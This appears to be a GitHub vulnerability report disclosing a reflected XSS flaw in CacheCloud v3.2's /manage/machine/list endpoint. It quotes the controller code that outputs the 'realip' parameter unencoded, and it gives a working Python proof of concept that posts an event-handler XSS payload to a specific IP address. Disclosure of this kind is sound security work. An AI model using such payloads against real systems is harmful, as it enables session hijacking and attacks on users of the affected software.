XSS vulnerability on /manage/machine/list #377
Description
XSS vulnerability on /manage/machine/list
Summary
In the latest version (v3.2) of CacheCloud, the endpoint /manage/machine/list does not encode user-controllable parameters when outputting them on web page, resulting in XSS vulnerability. This allows attackers to launch XSS attacks against users.
Details
- SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/MachineManageController.java#L110-L137
110: @RequestMapping({"/list"})
111: public ModelAndView doMachineList(HttpServletRequest request, HttpServletResponse response, Model model, String tabTag, String ipLike, Integer versionId, Integer isInstall, Integer useType, Integer type, Integer k8sType, String realip) {
112: if (tabTag.equals("machine")) {
113: List<MachineStats> machineList = this.machineCenter.getMachineStats(ipLike, useType, type, versionId, isInstall, k8sType, realip);
114: Map<String, Integer> machineInstanceCountMap = this.machineCenter.getMachineInstanceCountMap();
115: List<MachineRoom> roomList = this.machineCenter.getEffectiveRoom();
116: model.addAttribute("roomList", roomList);
117: model.addAttribute("list", machineList);
118: model.addAttribute("isInstall", isInstall);
119: model.addAttribute("versionId", versionId);
120: model.addAttribute("useType", useType);
121: model.addAttribute("ipLike", ipLike);
122: model.addAttribute("k8sType", k8sType);
123: model.addAttribute("type", type);
124: model.addAttribute("realip", realip);
125: model.addAttribute("machineActive", SuccessEnum.SUCCESS.value());
126: model.addAttribute("collectAlert", "(请等待" + ConstUtils.MACHINE_STATS_CRON_MINUTE + "分钟)");
127: model.addAttribute("machineInstanceCountMap", machineInstanceCountMap);
128: return new ModelAndView("manage/machine/machineList");
129: } else if (tabTag.equals("room")) {
130: List<MachineRoom> roomList = this.machineCenter.getAllRoom();
131: model.addAttribute("roomList", roomList);
132: return new ModelAndView("manage/machine/roomList");
133: } else {
134: return new ModelAndView("");
135: }
136: }
137:
POC
import requests
from requests.sessions import Session
class CustomSession(Session):
def request(
self,
method,
url,
params = None,
data = None,
headers = None,
cookies = None,
files = None,
auth = None,
timeout = None,
allow_redirects = True,
proxies = None,
hooks = None,
stream = None,
verify = None,
cert = None,
json = None,
):
arg_names = (
'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
)
local_variables = locals()
local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
local_variables['headers'] = local_variables.get('headers') or dict()
local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/manage/machine/list'
malicious_payload = 'X" tabindex="1" AUTOFoCUS OnFoCus="location=\'javascript:alert("zast-xss")\'"//'
payload = {'tabTag': 'machine', 'realip': malicious_payload}
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
- Screenshot
